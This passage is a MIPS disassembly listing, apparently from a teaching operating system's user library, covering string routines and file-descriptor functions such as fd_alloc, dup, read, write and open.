4018b8: 00000000 nop
4018bc: ae220000 sw v0,0(s1)
4018c0: 3c020041 lui v0,0x41
4018c4: 8c428004 lw v0,-32764(v0)
4018c8: 00000000 nop
4018cc: 8c4200c4 lw v0,196(v0)
4018d0: 8fbf0018 lw ra,24(sp)
4018d4: 8fb10014 lw s1,20(sp)
4018d8: 8fb00010 lw s0,16(sp)
4018dc: 03e00008 jr ra
4018e0: 27bd0020 addiu sp,sp,32
...
004018f0 <strlen>:
4018f0: 80820000 lb v0,0(a0)
4018f4: 00000000 nop
4018f8: 10400006 beqz v0,401914 <strlen+0x24>
4018fc: 00001821 move v1,zero
401900: 24840001 addiu a0,a0,1
401904: 80820000 lb v0,0(a0)
401908: 00000000 nop
40190c: 1440fffc bnez v0,401900 <strlen+0x10>
401910: 24630001 addiu v1,v1,1
401914: 03e00008 jr ra
401918: 00601021 move v0,v1
0040191c <strcpy>:
40191c: 00801821 move v1,a0
401920: 80a20000 lb v0,0(a1)
401924: 00000000 nop
401928: a0620000 sb v0,0(v1)
40192c: 24630001 addiu v1,v1,1
401930: 1440fffb bnez v0,401920 <strcpy+0x4>
401934: 24a50001 addiu a1,a1,1
401938: 03e00008 jr ra
40193c: 00801021 move v0,a0
00401940 <strchr>:
401940: 00801021 move v0,a0
401944: 00052e00 sll a1,a1,0x18
401948: 80830000 lb v1,0(a0)
40194c: 00000000 nop
401950: 1460000c bnez v1,401984 <strchr+0x44>
401954: 00052e03 sra a1,a1,0x18
401958: 03e00008 jr ra
40195c: 00001021 move v0,zero
401960: 10a3000a beq a1,v1,40198c <strchr+0x4c>
401964: 00000000 nop
401968: 24420001 addiu v0,v0,1
40196c: 80430000 lb v1,0(v0)
401970: 00000000 nop
401974: 1460fffa bnez v1,401960 <strchr+0x20>
401978: 00000000 nop
40197c: 03e00008 jr ra
401980: 00001021 move v0,zero
401984: 14a3fff8 bne a1,v1,401968 <strchr+0x28>
401988: 00000000 nop
40198c: 03e00008 jr ra
401990: 00000000 nop
00401994 <memcpy>:
401994: 10c0000a beqz a2,4019c0 <memcpy+0x2c>
401998: 24c2ffff addiu v0,a2,-1
40199c: 00801821 move v1,a0
4019a0: 00821021 addu v0,a0,v0
4019a4: 24460001 addiu a2,v0,1
4019a8: 90a20000 lbu v0,0(a1)
4019ac: 00000000 nop
4019b0: a0620000 sb v0,0(v1)
4019b4: 24630001 addiu v1,v1,1
4019b8: 1466fffb bne v1,a2,4019a8 <memcpy+0x14>
4019bc: 24a50001 addiu a1,a1,1
4019c0: 03e00008 jr ra
4019c4: 00801021 move v0,a0
004019c8 <strcmp>:
4019c8: 80830000 lb v1,0(a0)
4019cc: 00000000 nop
4019d0: 1060000c beqz v1,401a04 <strcmp+0x3c>
4019d4: 00000000 nop
4019d8: 10000014 b 401a2c <strcmp+0x64>
4019dc: 00000000 nop
4019e0: 24840001 addiu a0,a0,1
4019e4: 80830000 lb v1,0(a0)
4019e8: 00000000 nop
4019ec: 10600005 beqz v1,401a04 <strcmp+0x3c>
4019f0: 24a50001 addiu a1,a1,1
4019f4: 80a20000 lb v0,0(a1)
4019f8: 00000000 nop
4019fc: 1043fff8 beq v0,v1,4019e0 <strcmp+0x18>
401a00: 00000000 nop
401a04: 306300ff andi v1,v1,0xff
401a08: 90a50000 lbu a1,0(a1)
401a0c: 00000000 nop
401a10: 0065102b sltu v0,v1,a1
401a14: 10400003 beqz v0,401a24 <strcmp+0x5c>
401a18: 00000000 nop
401a1c: 03e00008 jr ra
401a20: 2402ffff li v0,-1
401a24: 03e00008 jr ra
401a28: 00a3102b sltu v0,a1,v1
401a2c: 80a20000 lb v0,0(a1)
401a30: 00000000 nop
401a34: 1443fff4 bne v0,v1,401a08 <strcmp+0x40>
401a38: 306300ff andi v1,v1,0xff
401a3c: 1000ffe9 b 4019e4 <strcmp+0x1c>
401a40: 24840001 addiu a0,a0,1
...
00401a50 <dev_lookup>:
401a50: 27bdffe8 addiu sp,sp,-24
401a54: afbf0010 sw ra,16(sp)
401a58: 00803021 move a2,a0
401a5c: 3c020040 lui v0,0x40
401a60: 8c447610 lw a0,30224(v0)
401a64: 00000000 nop
401a68: 14800017 bnez a0,401ac8 <dev_lookup+0x78>
401a6c: 3c020041 lui v0,0x41
401a70: 1000000e b 401aac <dev_lookup+0x5c>
401a74: 00000000 nop
401a78: 8c820000 lw v0,0(a0)
401a7c: 00000000 nop
401a80: 14c20006 bne a2,v0,401a9c <dev_lookup+0x4c>
401a84: 24630004 addiu v1,v1,4
401a88: aca40000 sw a0,0(a1)
401a8c: 10000014 b 401ae0 <dev_lookup+0x90>
401a90: 00001021 move v0,zero
401a94: 3c020040 lui v0,0x40
401a98: 24437614 addiu v1,v0,30228
401a9c: 8c640000 lw a0,0(v1)
401aa0: 00000000 nop
401aa4: 1480fff4 bnez a0,401a78 <dev_lookup+0x28>
401aa8: 3c020041 lui v0,0x41
401aac: 8c428004 lw v0,-32764(v0)
401ab0: 3c040040 lui a0,0x40
401ab4: 8c4500a4 lw a1,164(v0)
401ab8: 0c100086 jal 400218 <writef>
401abc: 24847484 addiu a0,a0,29828
401ac0: 10000007 b 401ae0 <dev_lookup+0x90>
401ac4: 2402fffd li v0,-3
401ac8: 8c820000 lw v0,0(a0)
401acc: 00000000 nop
401ad0: 14c2fff0 bne a2,v0,401a94 <dev_lookup+0x44>
401ad4: 00000000 nop
401ad8: 1000ffec b 401a8c <dev_lookup+0x3c>
401adc: aca40000 sw a0,0(a1)
401ae0: 8fbf0010 lw ra,16(sp)
401ae4: 00000000 nop
401ae8: 03e00008 jr ra
401aec: 27bd0018 addiu sp,sp,24
00401af0 <fd_alloc>:
401af0: 3c020040 lui v0,0x40
401af4: 8c46600c lw a2,24588(v0)
401af8: 3c055fc0 lui a1,0x5fc0
401afc: 3c080040 lui t0,0x40
401b00: 3c025fc1 lui v0,0x5fc1
401b04: 3447f000 ori a3,v0,0xf000
401b08: 00051582 srl v0,a1,0x16
401b0c: 00021080 sll v0,v0,0x2
401b10: 00c21021 addu v0,a2,v0
401b14: 8c420000 lw v0,0(v0)
401b18: 00000000 nop
401b1c: 30420200 andi v0,v0,0x200
401b20: 14400003 bnez v0,401b30 <fd_alloc+0x40>
401b24: 00000000 nop
401b28: 03e00008 jr ra
401b2c: ac850000 sw a1,0(a0)
401b30: 00051302 srl v0,a1,0xc
401b34: 00021080 sll v0,v0,0x2
401b38: 8d036008 lw v1,24584(t0)
401b3c: 00000000 nop
401b40: 00431021 addu v0,v0,v1
401b44: 8c420000 lw v0,0(v0)
401b48: 00000000 nop
401b4c: 30420200 andi v0,v0,0x200
401b50: 14400004 bnez v0,401b64 <fd_alloc+0x74>
401b54: 24a51000 addiu a1,a1,4096
401b58: 24a5f000 addiu a1,a1,-4096
401b5c: 03e00008 jr ra
401b60: ac850000 sw a1,0(a0)
401b64: 14a7ffe8 bne a1,a3,401b08 <fd_alloc+0x18>
401b68: 2402fff8 li v0,-8
401b6c: 03e00008 jr ra
401b70: 00000000 nop
00401b74 <fd_close>:
401b74: 27bdffe8 addiu sp,sp,-24
401b78: afbf0010 sw ra,16(sp)
401b7c: 00802821 move a1,a0
401b80: 0c100591 jal 401644 <syscall_mem_unmap>
401b84: 00002021 move a0,zero
401b88: 8fbf0010 lw ra,16(sp)
401b8c: 00000000 nop
401b90: 03e00008 jr ra
401b94: 27bd0018 addiu sp,sp,24
00401b98 <fd_lookup>:
401b98: 28820020 slti v0,a0,32
401b9c: 10400010 beqz v0,401be0 <fd_lookup+0x48>
401ba0: 00041b00 sll v1,a0,0xc
401ba4: 3c025fc0 lui v0,0x5fc0
401ba8: 00622021 addu a0,v1,v0
401bac: 00041282 srl v0,a0,0xa
401bb0: 3c030040 lui v1,0x40
401bb4: 8c636008 lw v1,24584(v1)
401bb8: 00000000 nop
401bbc: 00431021 addu v0,v0,v1
401bc0: 8c420000 lw v0,0(v0)
401bc4: 00000000 nop
401bc8: 30420200 andi v0,v0,0x200
401bcc: 10400004 beqz v0,401be0 <fd_lookup+0x48>
401bd0: 00000000 nop
401bd4: aca40000 sw a0,0(a1)
401bd8: 03e00008 jr ra
401bdc: 00001021 move v0,zero
401be0: 03e00008 jr ra
401be4: 2402fffd li v0,-3
00401be8 <fd2data>:
401be8: 27bdffe8 addiu sp,sp,-24
401bec: afbf0010 sw ra,16(sp)
401bf0: 0c100705 jal 401c14 <fd2num>
401bf4: 00000000 nop
401bf8: 00021d80 sll v1,v0,0x16
401bfc: 3c026000 lui v0,0x6000
401c00: 00621021 addu v0,v1,v0
401c04: 8fbf0010 lw ra,16(sp)
401c08: 00000000 nop
401c0c: 03e00008 jr ra
401c10: 27bd0018 addiu sp,sp,24
00401c14 <fd2num>:
401c14: 3c02a040 lui v0,0xa040
401c18: 00821021 addu v0,a0,v0
401c1c: 03e00008 jr ra
401c20: 00021302 srl v0,v0,0xc
00401c24 <num2fd>:
401c24: 00042300 sll a0,a0,0xc
401c28: 3c025fc0 lui v0,0x5fc0
401c2c: 03e00008 jr ra
401c30: 00821021 addu v0,a0,v0
00401c34 <close>:
401c34: 27bdffe0 addiu sp,sp,-32
401c38: afbf001c sw ra,28(sp)
401c3c: afb00018 sw s0,24(sp)
401c40: 0c1006e6 jal 401b98 <fd_lookup>
401c44: 27a50014 addiu a1,sp,20
401c48: 04400011 bltz v0,401c90 <close+0x5c>
401c4c: 00408021 move s0,v0
401c50: 8fa20014 lw v0,20(sp)
401c54: 00000000 nop
401c58: 8c440000 lw a0,0(v0)
401c5c: 0c100694 jal 401a50 <dev_lookup>
401c60: 27a50010 addiu a1,sp,16
401c64: 0440000a bltz v0,401c90 <close+0x5c>
401c68: 00408021 move s0,v0
401c6c: 8fa20010 lw v0,16(sp)
401c70: 00000000 nop
401c74: 8c420010 lw v0,16(v0)
401c78: 8fa40014 lw a0,20(sp)
401c7c: 0040f809 jalr v0
401c80: 00000000 nop
401c84: 8fa40014 lw a0,20(sp)
401c88: 0c1006dd jal 401b74 <fd_close>
401c8c: 00408021 move s0,v0
401c90: 02001021 move v0,s0
401c94: 8fbf001c lw ra,28(sp)
401c98: 8fb00018 lw s0,24(sp)
401c9c: 03e00008 jr ra
401ca0: 27bd0020 addiu sp,sp,32
00401ca4 <close_all>:
401ca4: 27bdffe0 addiu sp,sp,-32
401ca8: afbf0018 sw ra,24(sp)
401cac: afb10014 sw s1,20(sp)
401cb0: afb00010 sw s0,16(sp)
401cb4: 00008021 move s0,zero
401cb8: 24110020 li s1,32
401cbc: 0c10070d jal 401c34 <close>
401cc0: 02002021 move a0,s0
401cc4: 26100001 addiu s0,s0,1
401cc8: 1611fffc bne s0,s1,401cbc <close_all+0x18>
401ccc: 00000000 nop
401cd0: 8fbf0018 lw ra,24(sp)
401cd4: 8fb10014 lw s1,20(sp)
401cd8: 8fb00010 lw s0,16(sp)
401cdc: 03e00008 jr ra
401ce0: 27bd0020 addiu sp,sp,32
00401ce4 <dup>:
401ce4: 27bdffb8 addiu sp,sp,-72
401ce8: afbf0040 sw ra,64(sp)
401cec: afb7003c sw s7,60(sp)
401cf0: afb60038 sw s6,56(sp)
401cf4: afb50034 sw s5,52(sp)
401cf8: afb40030 sw s4,48(sp)
401cfc: afb3002c sw s3,44(sp)
401d00: afb20028 sw s2,40(sp)
401d04: afb10024 sw s1,36(sp)
401d08: afb00020 sw s0,32(sp)
401d0c: 00a0b821 move s7,a1
401d10: 0c1006e6 jal 401b98 <fd_lookup>
401d14: 27a50018 addiu a1,sp,24
401d18: 0440004f bltz v0,401e58 <dup+0x174>
401d1c: 00409821 move s3,v0
401d20: 0c10070d jal 401c34 <close>
401d24: 02e02021 move a0,s7
401d28: 00178300 sll s0,s7,0xc
401d2c: 3c025fc0 lui v0,0x5fc0
401d30: 8fa40018 lw a0,24(sp)
401d34: 0c1006fa jal 401be8 <fd2data>
401d38: 02028021 addu s0,s0,v0
401d3c: 0040a821 move s5,v0
401d40: 0c1006fa jal 401be8 <fd2data>
401d44: 02002021 move a0,s0
401d48: 00409021 move s2,v0
401d4c: 8fa50018 lw a1,24(sp)
401d50: 0200b021 move s6,s0
401d54: 00051302 srl v0,a1,0xc
401d58: 00021080 sll v0,v0,0x2
401d5c: 3c030040 lui v1,0x40
401d60: 8c636008 lw v1,24584(v1)
401d64: 00000000 nop
401d68: 00431021 addu v0,v0,v1
401d6c: 8c420000 lw v0,0(v0)
401d70: 00000000 nop
401d74: 30420604 andi v0,v0,0x604
401d78: afa20010 sw v0,16(sp)
401d7c: 00002021 move a0,zero
401d80: 00003021 move a2,zero
401d84: 0c10057f jal 4015fc <syscall_mem_map>
401d88: 02003821 move a3,s0
401d8c: 04400024 bltz v0,401e20 <dup+0x13c>
401d90: 00409821 move s3,v0
401d94: 00151582 srl v0,s5,0x16
401d98: 00021080 sll v0,v0,0x2
401d9c: 3c030040 lui v1,0x40
401da0: 8c63600c lw v1,24588(v1)
401da4: 00000000 nop
401da8: 00431021 addu v0,v0,v1
401dac: 8c420000 lw v0,0(v0)
401db0: 00000000 nop
401db4: 10400027 beqz v0,401e54 <dup+0x170>
401db8: 00008821 move s1,zero
401dbc: 3c140040 lui s4,0x40
401dc0: 3c100040 lui s0,0x40
401dc4: 02b12821 addu a1,s5,s1
401dc8: 00051302 srl v0,a1,0xc
401dcc: 00021080 sll v0,v0,0x2
401dd0: 8e836008 lw v1,24584(s4)
401dd4: 00000000 nop
401dd8: 00431021 addu v0,v0,v1
401ddc: 8c430000 lw v1,0(v0)
401de0: 00000000 nop
401de4: 30620200 andi v0,v1,0x200
401de8: 10400008 beqz v0,401e0c <dup+0x128>
401dec: 30620604 andi v0,v1,0x604
401df0: afa20010 sw v0,16(sp)
401df4: 00002021 move a0,zero
401df8: 00003021 move a2,zero
401dfc: 0c10057f jal 4015fc <syscall_mem_map>
401e00: 02513821 addu a3,s2,s1
401e04: 04400006 bltz v0,401e20 <dup+0x13c>
401e08: 00409821 move s3,v0
401e0c: 26311000 addiu s1,s1,4096
401e10: 12300010 beq s1,s0,401e54 <dup+0x170>
401e14: 02b12821 addu a1,s5,s1
401e18: 1000ffec b 401dcc <dup+0xe8>
401e1c: 00051302 srl v0,a1,0xc
401e20: 00002021 move a0,zero
401e24: 0c100591 jal 401644 <syscall_mem_unmap>
401e28: 02c02821 move a1,s6
401e2c: 00008021 move s0,zero
401e30: 3c110040 lui s1,0x40
401e34: 00002021 move a0,zero
401e38: 0c100591 jal 401644 <syscall_mem_unmap>
401e3c: 02502821 addu a1,s2,s0
401e40: 26101000 addiu s0,s0,4096
401e44: 12110004 beq s0,s1,401e58 <dup+0x174>
401e48: 00002021 move a0,zero
401e4c: 1000fffa b 401e38 <dup+0x154>
401e50: 00000000 nop
401e54: 02e09821 move s3,s7
401e58: 02601021 move v0,s3
401e5c: 8fbf0040 lw ra,64(sp)
401e60: 8fb7003c lw s7,60(sp)
401e64: 8fb60038 lw s6,56(sp)
401e68: 8fb50034 lw s5,52(sp)
401e6c: 8fb40030 lw s4,48(sp)
401e70: 8fb3002c lw s3,44(sp)
401e74: 8fb20028 lw s2,40(sp)
401e78: 8fb10024 lw s1,36(sp)
401e7c: 8fb00020 lw s0,32(sp)
401e80: 03e00008 jr ra
401e84: 27bd0048 addiu sp,sp,72
00401e88 <read>:
401e88: 27bdffd8 addiu sp,sp,-40
401e8c: afbf0024 sw ra,36(sp)
401e90: afb20020 sw s2,32(sp)
401e94: afb1001c sw s1,28(sp)
401e98: afb00018 sw s0,24(sp)
401e9c: 00809021 move s2,a0
401ea0: 00a08021 move s0,a1
401ea4: 00c08821 move s1,a2
401ea8: 0c1006e6 jal 401b98 <fd_lookup>
401eac: 27a50014 addiu a1,sp,20
401eb0: 04400028 bltz v0,401f54 <read+0xcc>
401eb4: 00402021 move a0,v0
401eb8: 8fa20014 lw v0,20(sp)
401ebc: 00000000 nop
401ec0: 8c440000 lw a0,0(v0)
401ec4: 0c100694 jal 401a50 <dev_lookup>
401ec8: 27a50010 addiu a1,sp,16
401ecc: 04400021 bltz v0,401f54 <read+0xcc>
401ed0: 00402021 move a0,v0
401ed4: 8fa70014 lw a3,20(sp)
401ed8: 00000000 nop
401edc: 8ce20008 lw v0,8(a3)
401ee0: 00000000 nop
401ee4: 30420003 andi v0,v0,0x3
401ee8: 24030001 li v1,1
401eec: 1443000a bne v0,v1,401f18 <read+0x90>
401ef0: 02002821 move a1,s0
401ef4: 3c020041 lui v0,0x41
401ef8: 8c428004 lw v0,-32764(v0)
401efc: 3c040040 lui a0,0x40
401f00: 248474a4 addiu a0,a0,29860
401f04: 8c4500a4 lw a1,164(v0)
401f08: 0c100086 jal 400218 <writef>
401f0c: 02403021 move a2,s2
401f10: 10000010 b 401f54 <read+0xcc>
401f14: 2404fffd li a0,-3
401f18: 8fa20010 lw v0,16(sp)
401f1c: 00000000 nop
401f20: 8c420008 lw v0,8(v0)
401f24: 00e02021 move a0,a3
401f28: 8ce70004 lw a3,4(a3)
401f2c: 0040f809 jalr v0
401f30: 02203021 move a2,s1
401f34: 04400007 bltz v0,401f54 <read+0xcc>
401f38: 00402021 move a0,v0
401f3c: 8fa30014 lw v1,20(sp)
401f40: 00000000 nop
401f44: 8c620004 lw v0,4(v1)
401f48: 00000000 nop
401f4c: 00821021 addu v0,a0,v0
401f50: ac620004 sw v0,4(v1)
401f54: 00801021 move v0,a0
401f58: 8fbf0024 lw ra,36(sp)
401f5c: 8fb20020 lw s2,32(sp)
401f60: 8fb1001c lw s1,28(sp)
401f64: 8fb00018 lw s0,24(sp)
401f68: 03e00008 jr ra
401f6c: 27bd0028 addiu sp,sp,40
00401f70 <readn>:
401f70: 27bdffd8 addiu sp,sp,-40
401f74: afbf0020 sw ra,32(sp)
401f78: afb3001c sw s3,28(sp)
401f7c: afb20018 sw s2,24(sp)
401f80: afb10014 sw s1,20(sp)
401f84: afb00010 sw s0,16(sp)
401f88: 00809821 move s3,a0
401f8c: 00a09021 move s2,a1
401f90: 14c00003 bnez a2,401fa0 <readn+0x30>
401f94: 00c08821 move s1,a2
401f98: 10000010 b 401fdc <readn+0x6c>
401f9c: 00001021 move v0,zero
401fa0: 00008021 move s0,zero
401fa4: 00001821 move v1,zero
401fa8: 02602021 move a0,s3
401fac: 02432821 addu a1,s2,v1
401fb0: 0c1007a2 jal 401e88 <read>
401fb4: 02233023 subu a2,s1,v1
401fb8: 04400008 bltz v0,401fdc <readn+0x6c>
401fbc: 00000000 nop
401fc0: 10400005 beqz v0,401fd8 <readn+0x68>
401fc4: 00000000 nop
401fc8: 02028021 addu s0,s0,v0
401fcc: 0211102b sltu v0,s0,s1
401fd0: 1440fff5 bnez v0,401fa8 <readn+0x38>
401fd4: 02001821 move v1,s0
401fd8: 02001021 move v0,s0
401fdc: 8fbf0020 lw ra,32(sp)
401fe0: 8fb3001c lw s3,28(sp)
401fe4: 8fb20018 lw s2,24(sp)
401fe8: 8fb10014 lw s1,20(sp)
401fec: 8fb00010 lw s0,16(sp)
401ff0: 03e00008 jr ra
401ff4: 27bd0028 addiu sp,sp,40
00401ff8 <write>:
401ff8: 27bdffd8 addiu sp,sp,-40
401ffc: afbf0024 sw ra,36(sp)
402000: afb20020 sw s2,32(sp)
402004: afb1001c sw s1,28(sp)
402008: afb00018 sw s0,24(sp)
40200c: 00809021 move s2,a0
402010: 00a08021 move s0,a1
402014: 00c08821 move s1,a2
402018: 0c1006e6 jal 401b98 <fd_lookup>
40201c: 27a50014 addiu a1,sp,20
402020: 04400027 bltz v0,4020c0 <write+0xc8>
402024: 00402021 move a0,v0
402028: 8fa20014 lw v0,20(sp)
40202c: 00000000 nop
402030: 8c440000 lw a0,0(v0)
402034: 0c100694 jal 401a50 <dev_lookup>
402038: 27a50010 addiu a1,sp,16
40203c: 04400020 bltz v0,4020c0 <write+0xc8>
402040: 00402021 move a0,v0
402044: 8fa30014 lw v1,20(sp)
402048: 00000000 nop
40204c: 8c620008 lw v0,8(v1)
402050: 00000000 nop
402054: 30420003 andi v0,v0,0x3
402058: 1440000a bnez v0,402084 <write+0x8c>
40205c: 02002821 move a1,s0
402060: 3c020041 lui v0,0x41
402064: 8c428004 lw v0,-32764(v0)
402068: 3c040040 lui a0,0x40
40206c: 248474c0 addiu a0,a0,29888
402070: 8c4500a4 lw a1,164(v0)
402074: 0c100086 jal 400218 <writef>
402078: 02403021 move a2,s2
40207c: 10000010 b 4020c0 <write+0xc8>
402080: 2404fffd li a0,-3
402084: 8fa20010 lw v0,16(sp)
402088: 00000000 nop
40208c: 8c42000c lw v0,12(v0)
402090: 00602021 move a0,v1
402094: 8c670004 lw a3,4(v1)
402098: 0040f809 jalr v0
40209c: 02203021 move a2,s1
4020a0: 18400007 blez v0,4020c0 <write+0xc8>
4020a4: 00402021 move a0,v0
4020a8: 8fa30014 lw v1,20(sp)
4020ac: 00000000 nop
4020b0: 8c620004 lw v0,4(v1)
4020b4: 00000000 nop
4020b8: 00821021 addu v0,a0,v0
4020bc: ac620004 sw v0,4(v1)
4020c0: 00801021 move v0,a0
4020c4: 8fbf0024 lw ra,36(sp)
4020c8: 8fb20020 lw s2,32(sp)
4020cc: 8fb1001c lw s1,28(sp)
4020d0: 8fb00018 lw s0,24(sp)
4020d4: 03e00008 jr ra
4020d8: 27bd0028 addiu sp,sp,40
004020dc <seek>:
4020dc: 27bdffe0 addiu sp,sp,-32
4020e0: afbf001c sw ra,28(sp)
4020e4: afb00018 sw s0,24(sp)
4020e8: 00a08021 move s0,a1
4020ec: 0c1006e6 jal 401b98 <fd_lookup>
4020f0: 27a50010 addiu a1,sp,16
4020f4: 04400005 bltz v0,40210c <seek+0x30>
4020f8: 00000000 nop
4020fc: 8fa20010 lw v0,16(sp)
402100: 00000000 nop
402104: ac500004 sw s0,4(v0)
402108: 00001021 move v0,zero
40210c: 8fbf001c lw ra,28(sp)
402110: 8fb00018 lw s0,24(sp)
402114: 03e00008 jr ra
402118: 27bd0020 addiu sp,sp,32
0040211c <fstat>:
40211c: 27bdffe0 addiu sp,sp,-32
402120: afbf001c sw ra,28(sp)
402124: afb00018 sw s0,24(sp)
402128: 00a08021 move s0,a1
40212c: 0c1006e6 jal 401b98 <fd_lookup>
402130: 27a50014 addiu a1,sp,20
402134: 04400012 bltz v0,402180 <fstat+0x64>
402138: 00000000 nop
40213c: 8fa20014 lw v0,20(sp)
402140: 00000000 nop
402144: 8c440000 lw a0,0(v0)
402148: 0c100694 jal 401a50 <dev_lookup>
40214c: 27a50010 addiu a1,sp,16
402150: 0440000b bltz v0,402180 <fstat+0x64>
402154: 00000000 nop
402158: a2000000 sb zero,0(s0)
40215c: ae000080 sw zero,128(s0)
402160: ae000084 sw zero,132(s0)
402164: 8fa20010 lw v0,16(sp)
402168: 00000000 nop
40216c: ae020088 sw v0,136(s0)
402170: 8c420014 lw v0,20(v0)
402174: 8fa40014 lw a0,20(sp)
402178: 0040f809 jalr v0
40217c: 02002821 move a1,s0
402180: 8fbf001c lw ra,28(sp)
402184: 8fb00018 lw s0,24(sp)
402188: 03e00008 jr ra
40218c: 27bd0020 addiu sp,sp,32
00402190 <stat>:
402190: 27bdffe0 addiu sp,sp,-32
402194: afbf0018 sw ra,24(sp)
402198: afb10014 sw s1,20(sp)
40219c: afb00010 sw s0,16(sp)
4021a0: 00a08021 move s0,a1
4021a4: 0c1008a0 jal 402280 <open>
4021a8: 00002821 move a1,zero
4021ac: 04400008 bltz v0,4021d0 <stat+0x40>
4021b0: 00408821 move s1,v0
4021b4: 00402021 move a0,v0
4021b8: 0c100847 jal 40211c <fstat>
4021bc: 02002821 move a1,s0
4021c0: 00408021 move s0,v0
4021c4: 0c10070d jal 401c34 <close>
4021c8: 02202021 move a0,s1
4021cc: 02008821 move s1,s0
4021d0: 02201021 move v0,s1
4021d4: 8fbf0018 lw ra,24(sp)
4021d8: 8fb10014 lw s1,20(sp)
4021dc: 8fb00010 lw s0,16(sp)
4021e0: 03e00008 jr ra
4021e4: 27bd0020 addiu sp,sp,32
...
004021f0 <pageref>:
4021f0: 00041582 srl v0,a0,0x16
4021f4: 00021080 sll v0,v0,0x2
4021f8: 3c030040 lui v1,0x40
4021fc: 8c63600c lw v1,24588(v1)
402200: 00000000 nop
402204: 00431021 addu v0,v0,v1
402208: 8c420000 lw v0,0(v0)
40220c: 00000000 nop
402210: 30420200 andi v0,v0,0x200
402214: 10400016 beqz v0,402270 <pageref+0x80>
402218: 3c030040 lui v1,0x40
40221c: 00041302 srl v0,a0,0xc
402220: 00021080 sll v0,v0,0x2
402224: 8c636008 lw v1,24584(v1)
402228: 00000000 nop
40222c: 00431021 addu v0,v0,v1
402230: 8c440000 lw a0,0(v0)
402234: 00000000 nop
402238: 30820200 andi v0,a0,0x200
40223c: 1040000c beqz v0,402270 <pageref+0x80>
402240: 00000000 nop
402244: 00041302 srl v0,a0,0xc
402248: 00021880 sll v1,v0,0x2
40224c: 00021100 sll v0,v0,0x4
402250: 00431023 subu v0,v0,v1
402254: 3c030040 lui v1,0x40
402258: 8c636004 lw v1,24580(v1)
40225c: 00000000 nop
402260: 00431021 addu v0,v0,v1
402264: 94420008 lhu v0,8(v0)
402268: 03e00008 jr ra
40226c: 00000000 nop
402270: 03e00008 jr ra
402274: 00001021 move v0,zero
...
00402280 <open>:
402280: 27bdffd0 addiu sp,sp,-48
402284: afbf002c sw ra,44(sp)
402288: afb40028 sw s4,40(sp)
40228c: afb30024 sw s3,36(sp)
402290: afb20020 sw s2,32(sp)
402294: afb1001c sw s1,28(sp)
402298: afb00018 sw s0,24(sp)
40229c: 00809021 move s2,a0
4022a0: 00a08821 move s1,a1
4022a4: 0c1006bc jal 401af0 <fd_alloc>
4022a8: 27a40010 addiu a0,sp,16
4022ac: 04410006 bgez v0,4022c8 <open+0x48>
4022b0: 00408021 move s0,v0
4022b4: 3c040040 lui a0,0x40
4022b8: 0c100086 jal 400218 <writef>
4022bc: 248474e8 addiu a0,a0,29928
4022c0: 1000002f b 402380 <open+0x100>
4022c4: 02001021 move v0,s0
4022c8: 02402021 move a0,s2
4022cc: 8fa60010 lw a2,16(sp)
4022d0: 0c100aed jal 402bb4 <fsipc_open>
4022d4: 02202821 move a1,s1
4022d8: 04410007 bgez v0,4022f8 <open+0x78>
4022dc: 00408021 move s0,v0
4022e0: 3c040040 lui a0,0x40
4022e4: 24847500 addiu a0,a0,29952
4022e8: 0c100086 jal 400218 <writef>
4022ec: 02402821 move a1,s2
4022f0: 10000023 b 402380 <open+0x100>
4022f4: 02001021 move v0,s0
4022f8: 8fa40010 lw a0,16(sp)
4022fc: 0c1006fa jal 401be8 <fd2data>
402300: 00000000 nop
402304: 8fa40010 lw a0,16(sp)
402308: 00000000 nop
40230c: 8c920090 lw s2,144(a0)
402310: 8c93000c lw s3,12(a0)
402314: 1640000a bnez s2,402340 <open+0xc0>
402318: 0040a021 move s4,v0
40231c: 0c100705 jal 401c14 <fd2num>
402320: 00000000 nop
402324: 10000015 b 40237c <open+0xfc>
402328: 00408021 move s0,v0
40232c: 3c040040 lui a0,0x40
402330: 0c100086 jal 400218 <writef>
402334: 24847518 addiu a0,a0,29976
402338: 10000011 b 402380 <open+0x100>
40233c: 02001021 move v0,s0
402340: 00008821 move s1,zero
402344: 02602021 move a0,s3
402348: 02202821 move a1,s1
40234c: 0c100b0c jal 402c30 <fsipc_map>
402350: 02343021 addu a2,s1,s4
402354: 0440fff5 bltz v0,40232c <open+0xac>
402358: 00408021 move s0,v0
40235c: 26311000 addiu s1,s1,4096
402360: 0232102b sltu v0,s1,s2
402364: 1440fff8 bnez v0,402348 <open+0xc8>
402368: 02602021 move a0,s3
40236c: 8fa40010 lw a0,16(sp)
402370: 0c100705 jal 401c14 <fd2num>
402374: 00000000 nop
402378: 00408021 move s0,v0
40237c: 02001021 move v0,s0
402380: 8fbf002c lw ra,44(sp)
402384: 8fb40028 lw s4,40(sp)
402388: 8fb30024 lw s3,36(sp)
40238c: 8fb20020 lw s2,32(sp)
402390: 8fb1001c lw s1,28(sp)
402394: 8fb00018 lw s0,24(sp)
402398: 03e00008 jr ra
40239c: 27bd0030 addiu sp,sp,48
004023a0 <file_close>:
4023a0: 27bdffd8 addiu sp,sp,-40
4023a4: afbf0020 sw ra,32(sp)
4023a8: afb3001c sw s3,28(sp)
4023ac: afb20018 sw s2,24(sp)
4023b0: afb10014 sw s1,20(sp)
4023b4: afb00010 sw s0,16(sp)
4023b8: 8c91000c lw s1,12(a0)
4023bc: 8c920090 lw s2,144(a0)
4023c0: 0c1006fa jal 401be8 <fd2data>
4023c4: 00000000 nop
4023c8: 12400009 beqz s2,4023f0 <file_close+0x50>
4023cc: 00409821 move s3,v0
4023d0: 00008021 move s0,zero
4023d4: 02202021 move a0,s1
4023d8: 0c100b46 jal 402d18 <fsipc_dirty>
4023dc: 02002821 move a1,s0
4023e0: 26101000 addiu s0,s0,4096
4023e4: 0212102b sltu v0,s0,s2
4023e8: 1440fffb bnez v0,4023d8 <file_close+0x38>
4023ec: 02202021 move a0,s1
4023f0: 0c100b39 jal 402ce4 <fsipc_close>
4023f4: 02202021 move a0,s1
4023f8: 0441000b bgez v0,402428 <file_close+0x88>
4023fc: 00408021 move s0,v0
402400: 3c040040 lui a0,0x40
402404: 0c100086 jal 400218 <writef>
402408: 24847530 addiu a0,a0,30000
40240c: 10000013 b 40245c <file_close+0xbc>
402410: 02001021 move v0,s0
402414: 3c040040 lui a0,0x40
402418: 0c100086 jal 400218 <writef>
40241c: 24847548 addiu a0,a0,30024
402420: 1000000e b 40245c <file_close+0xbc>
402424: 02001021 move v0,s0
402428: 1240000a beqz s2,402454 <file_close+0xb4>
40242c: 00008821 move s1,zero
402430: 00002021 move a0,zero
402434: 0c100591 jal 401644 <syscall_mem_unmap>
